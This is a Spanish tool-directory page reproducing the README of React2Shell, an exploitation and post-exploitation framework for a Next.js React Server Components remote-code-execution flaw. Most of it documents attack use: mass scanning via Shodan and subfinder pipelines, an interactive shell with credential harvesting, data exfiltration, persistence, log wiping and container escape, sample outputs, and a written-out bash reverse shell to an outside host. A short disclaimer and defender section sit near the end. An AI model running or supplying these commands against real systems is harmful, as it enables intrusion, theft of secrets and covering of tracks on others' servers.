Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
React2Shell — R2S es un framework integral de explotación y post-explotación dirigido a la vulnerabilidad de React Server Components de Next.js (CVE-2025-55182). Proporciona un shell interactivo con funciones avanzadas para pruebas de penetración, incluyendo transferencia de archivos, persistencia, enumeración, comprobaciones de escalada de privilegios y más. | Kitploit
Herramientas/GitHubGitHub/4nuxd/react2shell
Frameworks de Pruebas de PenetraciónEscalada de PrivilegiosFrameworks de ExploitsMecanismos de PersistenciaMovimiento LateralExplotación de Aplicaciones WebExfiltración de DatosPost-ExplotaciónComando y ControlEscape de Contenedores
GitHub
43hace 9 mesesAún no revisado
4nuxd/react2shell

React2Shell

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

R2S es un framework integral de explotación y post-explotación dirigido a la vulnerabilidad de React Server Components de Next.js (CVE-2025-55182). Proporciona un shell interactivo con funciones avanzadas para pruebas de penetración, incluyendo transferencia de archivos, persistencia, enumeración, comprobaciones de escalada de privilegios y más.

Compartir

🚀 R2S - Framework de Explotación RSC para Next.js

Version Python License CVE

Framework avanzado de post-explotación para RCE de React Server Components de Next.js

Características • Instalación • Uso • Comandos • Ejemplos


📋 Resumen

R2S es un completo framework de explotación y post-explotación que apunta a la vulnerabilidad de React Server Components de Next.js (CVE-2025-55182). Proporciona un shell interactivo con funciones avanzadas para pruebas de penetración, incluyendo transferencia de archivos, persistencia, enumeración, comprobaciones de escalada de privilegios y más.

🎯 Capacidades clave

  • ✅ Escaneo automatizado de vulnerabilidades - Escaneo masivo de múltiples objetivos
  • ✅ Shell RCE interactivo - Ejecución de comandos con estado y navegación de directorios
  • ✅ Transferencia de archivos por HTTP - Subir/descargar archivos sin limitaciones de base64
  • ✅ Automatización de reverse shell - Probar más de 25 payloads de reverse shell
  • ✅ Enumeración avanzada - Metadatos de sistema, red, contenedores y nube
  • ✅ Escalada de privilegios - Detección automatizada de vectores de escalada de privilegios
  • ✅ Cosecha de credenciales - Extracción de contraseñas, claves, tokens y secretos
  • ✅ Mecanismos de persistencia - Mantener acceso a través de reinicios
  • ✅ Movimiento lateral - Descubrir y pivotar a otros hosts
  • ✅ Escape de contenedores - Verificar vectores de escape de Docker/Kubernetes
  • ✅ Exfiltración de datos - Extraer archivos y configuraciones sensibles
  • ✅ Operaciones sigilosas - Limpiar registros y ocultar rastros

  • 🔥 Características

    🌐 Explotación principal

    • Escaneo masivo con soporte de múltiples hilos
    • Modo pipeline para integración con otras herramientas
    • Detección automática de vulnerabilidades para Next.js RSC
    • Shell interactivo con estado con directorio de trabajo persistente

    📁 Operaciones de archivos

    • Subida por HTTP - Transferir archivos al objetivo mediante wget/curl
    • Descarga por HTTP - Exfiltrar archivos mediante solicitudes POST
    • Sin limitaciones de tamaño - Funciona con archivos grandes (a diferencia de métodos base64)
    • Servidor HTTP automático - Inicia/para según sea necesario

    🔍 Reconocimiento y enumeración

    • Enumeración del sistema - SO, kernel, usuarios, procesos
    • Descubrimiento de red - Interfaces, rutas, ARP, DNS, puertos en escucha
    • Detección de contenedores - Identificación de Docker, Kubernetes, LXC
    • Metadatos de nube - Extracción de credenciales AWS, GCP, Azure
    • Volcado de memoria de procesos - Extraer secretos de procesos en ejecución
    • Descubrimiento de archivos interesantes - SUID, directorios escribibles, copias de seguridad, configuraciones

    🔐 Cosecha de credenciales

    • Variables de entorno (contraseñas, claves API, tokens)
    • Archivos .env y archivos de configuración
    • Claves privadas SSH y authorized_keys
    • Historial de Bash con comandos sensibles
    • Archivos de base de datos (volcados SQLite, MySQL)
    • Credenciales de nube (AWS, Azure, GCP)
    • Credenciales Git y tokens NPM
    • Datos del navegador (cookies, datos de inicio de sesión)
    • Secretos de Docker y Kubernetes

    ⬆️ Escalada de privilegios

    • Detección de binarios SUID/SGID
    • Enumeración de permisos Sudo
    • Archivos del sistema escribibles (/etc/passwd, /etc/shadow)
    • Verificaciones de acceso al socket Docker
    • Análisis de capacidades de Linux
    • Sugerencias de exploits de kernel
    • Enumeración de tareas Cron
    • Oportunidades de secuestro de PATH

    🔄 Post-explotación

    • Mecanismos de persistencia - Tareas Cron, .bashrc, servicios systemd
    • Persistencia avanzada - LD_PRELOAD, temporizadores systemd
    • Escaneo de puertos - Reconocimiento de red interna
    • Movimiento lateral - Descubrimiento de claves SSH, análisis de known_hosts
    • Escape de contenedores - Verificaciones de contenedores privilegiados, análisis de capacidades
    • Exfiltración de datos - Recopilación automatizada de datos sensibles
    • Automatización de reverse shell - Más de 25 tipos de payload con reintento automático

    🥷 Sigilo y evasión

    • Limpieza de registros - Historial de Bash, registros de autenticación, syslog
    • Cobertura de rastros - Limpieza de wtmp, lastlog
    • Gestión de sesiones - Guardar y reanudar sesiones

    🛠️ Instalación

    Prerrequisitos

    root@kitploit:~
    # Python 3.6 or higher
    python3 --version
    
    # Install dependencies
    pip3 install requests urllib3
    

    Inicio rápido

    root@kitploit:~
    # Clone or download the tool
    cd r2s-main
    
    # Make executable (optional)
    chmod +x r2s_enhanced.py
    
    # Run the tool
    python3 r2s_enhanced.py -h
    

    🚀 Uso

    Sintaxis básica

    root@kitploit:~
    python3 r2s_enhanced.py [OPTIONS]
    

    Opciones de línea de comandos

    OpciónDescripciónPor defecto
    -u, --urlURL del objetivo único-
    -l, --listArchivo que contiene lista de URLs-
    -c, --cmdComando inicial a ejecutarid
    -t, --threadsNúmero de hilos de escaneo30
    -p, --proxyProxy HTTP (ej., http://127.0.0.1:8080)-
    -v, --verboseHabilitar salida detalladaFalse
    --http-portPuerto del servidor HTTP para transferencia de archivos8000

    Métodos de entrada

    1. Objetivo único

    root@kitploit:~
    python3 r2s_enhanced.py -u http://target.com
    

    2. Múltiples objetivos (archivo)

    root@kitploit:~
    python3 r2s_enhanced.py -l targets.txt -t 50
    

    3. Modo pipeline (stdin)

    root@kitploit:~
    cat targets.txt | python3 r2s_enhanced.py
    shodan search "Next.js" | python3 r2s_enhanced.py
    subfinder -d example.com | httpx | python3 r2s_enhanced.py
    

    💻 Comandos del Shell Interactivo

    Una vez que obtengas acceso RCE, entrarás a un shell interactivo con estos comandos:

    📂 Transferencia de archivos

    root@kitploit:~
    upload <local_file> <remote_path>    # Upload file to target
    download <remote_file> <local_path>  # Download file from target
    

    🧭 Navegación

    root@kitploit:~
    cd <directory>                       # Change working directory
    pwd                                  # Print working directory
    

    🔍 Enumeración

    root@kitploit:~
    enum                                 # Complete system enumeration
    privesc                              # Privilege escalation checks
    harvest                              # Credential harvesting
    portscan <ip>                        # Scan internal network ports
    memdump [pid]                        # Dump process memory for secrets
    

    🎯 Post-explotación

    root@kitploit:~
    lateral                              # Lateral movement opportunities
    escape                               # Container escape vectors
    exfil [type]                         # Exfiltrate data (env/config/keys/db/logs/all)
    reverse <lhost> <lport>              # Try multiple reverse shell payloads
    

    🔒 Persistencia

    root@kitploit:~
    persist                              # Add basic persistence
    advpersist                           # Add advanced persistence
    

    🥷 Sigilo

    root@kitploit:~
    stealth                              # Clear logs and hide tracks
    

    💾 Gestión de sesiones

    root@kitploit:~
    save                                 # Save current session
    help, ?                              # Show help message
    exit, quit                           # Exit interactive shell
    

    🖥️ Comandos del sistema

    Ejecuta cualquier comando de shell directamente:

    root@kitploit:~
    whoami
    id
    uname -a
    ps aux
    netstat -tulpn
    cat /etc/passwd
    

    📚 Ejemplos

    Ejemplo 1: Explotación básica

    root@kitploit:~
    $ python3 r2s_enhanced.py -u http://vulnerable-app.com
    
        _   __          __  ____            
       / | / /__  _  __/ /_/ __ \________   
      /  |/ / _ \| |/_/ __/ /_/ / ___/ _ \  
     / /|  /  __/>  </_ _/ _, _/ /__/  __/  
    /_/ |_/\___/_/|_|\__/_/ |_|\___/\___/   
    
       Next.js RSC Exploit Tool (CVE-2025-55182)
       Mass Scanner & Pipeline Edition (v4.1.0 - Enhanced)
    
       >> CREDIT( G4rxd )
    
    [*] Loaded 1 targets. Starting scan with 30 threads...
    [*] Payload Command: id
    
    [VULN] http://vulnerable-app.com >>> RCE SUCCESS
           Output: uid=1000(node) gid=1000(node) groups=1000(node)
    
    [+] Stateful Interactive RCE shell started. Type 'help' for commands.
    [*] Advanced features: enum, privesc, persist, portscan, harvest, stealth
    [*] New features: memdump, lateral, escape, exfil, advpersist, reverse
    
    [+] HTTP server started on 192.168.1.100:8000
    
    next-rce:/app$
    

    Ejemplo 2: Enumeración del sistema

    root@kitploit:~
    next-rce:/app$ enum
    
    [*] Starting automated enumeration...
    
    ============================================================
    [*] System Info
    ============================================================
    Linux 5.15.0-91-generic #101-Ubuntu SMP x86_64 GNU/Linux
    NAME="Ubuntu"
    VERSION="22.04.3 LTS (Jammy Jellyfish)"
    
    ============================================================
    [*] Current User
    ============================================================
    node
    uid=1000(node) gid=1000(node) groups=1000(node),27(sudo)
    
    ============================================================
    [*] Container Detection
    ============================================================
    12:devices:/docker/a1b2c3d4e5f6
    11:cpuset:/docker/a1b2c3d4e5f6
    [Docker container detected]
    
    ...
    

    Ejemplo 3: Transferencia de archivos

    root@kitploit:~
    # Upload a file
    next-rce:/app$ upload /tmp/exploit.sh /var/tmp/exploit.sh
    [*] Uploading /tmp/exploit.sh (2048 bytes) via HTTP...
    [+] Upload successful!
        -rwxr-xr-x 1 node node 2048 Dec 12 03:28 /var/tmp/exploit.sh
    
    # Download a file
    next-rce:/app$ download /etc/passwd ./passwd.txt
    [*] Downloading /etc/passwd via HTTP...
    [+] Download successful! (1523 bytes)
        Saved to: ./passwd.txt
    

    Ejemplo 4: Cosecha de credenciales

    root@kitploit:~
    next-rce:/app$ harvest
    
    [*] Harvesting credentials...
    
    [*] Environment Variables:
    DATABASE_PASSWORD=super_secret_pass
    API_KEY=sk-1234567890abcdef
    AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
    
    [*] .env Files:
    /app/.env
    /app/.env.production
    /var/www/.env.local
    
    [*] SSH Keys:
    /home/node/.ssh/id_rsa
    /root/.ssh/id_rsa
    
    ...
    

    Ejemplo 5: Reverse Shell

    root@kitploit:~
    next-rce:/app$ reverse 192.168.1.100 4444
    
    [*] Starting reverse shell attempts to 192.168.1.100:4444
    [!] Make sure you have a listener running: nc -lvnp 4444
    
    [*] Trying 25 different reverse shell payloads...
    
    [1/25] Trying Bash TCP... ✓ Executed
    [?] Did you receive a connection? (y/n/s to stop): y
    
    [+] SUCCESS! Reverse shell established using: Bash TCP
    [*] Payload: bash -i >& /dev/tcp/192.168.1.100/4444 0>&1
    

    Ejemplo 6: Escaneo masivo

    root@kitploit:~
    $ cat targets.txt
    http://app1.example.com
    http://app2.example.com
    http://app3.example.com
    
    $ python3 r2s_enhanced.py -l targets.txt -t 50
    
    [*] Loaded 3 targets. Starting scan with 50 threads...
    
    [VULN] http://app1.example.com >>> RCE SUCCESS
    [VULN] http://app3.example.com >>> RCE SUCCESS
    
    [*] Scan completed.
    

    Ejemplo 7: Comprobación de escalada de privilegios

    root@kitploit:~
    next-rce:/app$ privesc
    
    [*] Checking privilege escalation vectors...
    
    [*] SUID Binaries:
    /usr/bin/sudo
    /usr/bin/passwd
    /usr/bin/mount
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    
    [*] Sudo Permissions:
    User node may run the following commands:
        (ALL : ALL) NOPASSWD: /usr/bin/docker
    
    [*] Docker Socket:
    srw-rw---- 1 root docker 0 Dec 12 03:28 /var/run/docker.sock
    
    [*] Docker Group:
    In docker group - EXPLOITABLE!
    
    ...
    

    Ejemplo 8: Escape de contenedores

    root@kitploit:~
    next-rce:/app$ escape
    
    [*] Checking container escape vectors...
    
    [*] Container Type:
    12:devices:/docker/a1b2c3d4e5f6
    
    [*] Privileged Container:
    PRIVILEGED
    
    [*] Docker Socket:
    srw-rw---- 1 root docker 0 Dec 12 03:28 /var/run/docker.sock
    
    [*] Capabilities:
    CapPrm: 0000003fffffffff
    CapEff: 0000003fffffffff
    [Full capabilities - container is privileged]
    
    ...
    

    🔧 Funciones avanzadas

    Payloads de Reverse Shell

    La herramienta incluye más de 25 payloads de reverse shell en múltiples lenguajes y técnicas:

    • Bash (TCP, UDP, variantes exec)
    • Netcat (tradicional, mkfifo, OpenBSD)
    • Python/Python3 (socket, pty)
    • Perl (múltiples variantes)
    • PHP (exec, system, passthru)
    • Ruby (variantes socket)
    • Node.js (child_process, socket)
    • Socat, Telnet, AWK
    • Golang, OpenSSL

    Extracción de metadatos de nube

    Detecta y extrae automáticamente credenciales de:

    • AWS - Roles IAM, credenciales de seguridad
    • GCP - Tokens de cuenta de servicio
    • Azure - Metadatos de instancia
    • Variables de entorno con credenciales de nube

    Detección de contenedores

    Identifica y analiza:

    • Contenedores Docker
    • Pods de Kubernetes
    • Contenedores LXC
    • Privilegiado vs no privilegiado
    • Vectores de escape disponibles

    ⚠️ Aviso legal

    SOLO PARA PROPÓSITOS EDUCATIVOS Y PRUEBAS AUTORIZADAS

    Esta herramienta se proporciona solo con fines educativos y para pruebas de penetración autorizadas. El uso de esta herramienta para atacar objetivos sin consentimiento mutuo previo es ilegal. El autor no es responsable de ningún uso indebido o daño causado por esta herramienta.

    Requisitos para uso legal:

    • ✅ Autorización por escrito del propietario del objetivo
    • ✅ Alcance y reglas de compromiso definidos
    • ✅ Compromiso de pruebas de penetración profesional
    • ❌ Acceso no autorizado a sistemas
    • ❌ Intención maliciosa o daño

    🛡️ Detección y defensa

    Para defensores

    Detección:

    • Monitorear cabeceras Next-Action inusuales
    • Buscar solicitudes POST multipart/form-data a endpoints inexistentes
    • Verificar salida de comandos codificada en base64 en respuestas de error
    • Monitorear child_process.execSync en registros de Next.js

    Mitigación:

    • Actualizar Next.js a la última versión parcheada
    • Implementar reglas de Firewall de Aplicaciones Web (WAF)
    • Restringir la ejecución de código del lado del servidor
    • Monitorear y registrar todas las solicitudes RSC
    • Implementar validación de entrada adecuada

    📊 Historial de versiones

    v4.1.0 (Actual) - Edición mejorada

    • ✅ Automatización de reverse shell añadida (más de 25 payloads)
    • ✅ Capacidades de volcado de memoria añadidas
    • ✅ Descubrimiento de movimiento lateral añadido
    • ✅ Verificaciones de escape de contenedores añadidas
    • ✅ Automatización de exfiltración de datos añadida
    • ✅ Mecanismos de persistencia avanzada añadidos
    • ✅ Transferencia de archivos HTTP mejorada
    • ✅ Funciones de enumeración mejoradas
    • ✅ Mejor manejo de errores y experiencia de usuario

    v4.0.0 - Framework de Post-Explotación

    • ✅ Transferencia de archivos basada en HTTP
    • ✅ Mecanismos de persistencia
    • ✅ Escáner de puertos
    • ✅ Comprobaciones de escalada de privilegios
    • ✅ Enumeración de red
    • ✅ Cosecha de credenciales
    • ✅ Gestión de sesiones
    • ✅ Enumeración automatizada
    • ✅ Funciones de sigilo

    v3.0.0 - Shell Interactivo

    • Shell con estado y navegación de directorios
    • Transferencia básica de archivos (base64)
    • Manejo de errores mejorado

    🤝 Contribuciones

    ¡Las contribuciones son bienvenidas! Asegúrate de que todas las contribuciones sean con fines educativos y de seguridad defensiva.


    👨‍💻 Autor

    G4rxd


    🙏 Créditos

    • Equipo de descubrimiento de CVE-2025-55182
    • Comunidad de investigación de seguridad de Next.js
    • Comunidad de herramientas de seguridad de código abierto

    📄 Licencia

    Este proyecto está licenciado solo para propósitos educativos y pruebas autorizadas.


    ⚡ ¡Feliz Hacking Ético! ⚡

    Recuerda: Un gran poder conlleva una gran responsabilidad.

    Descargar herramienta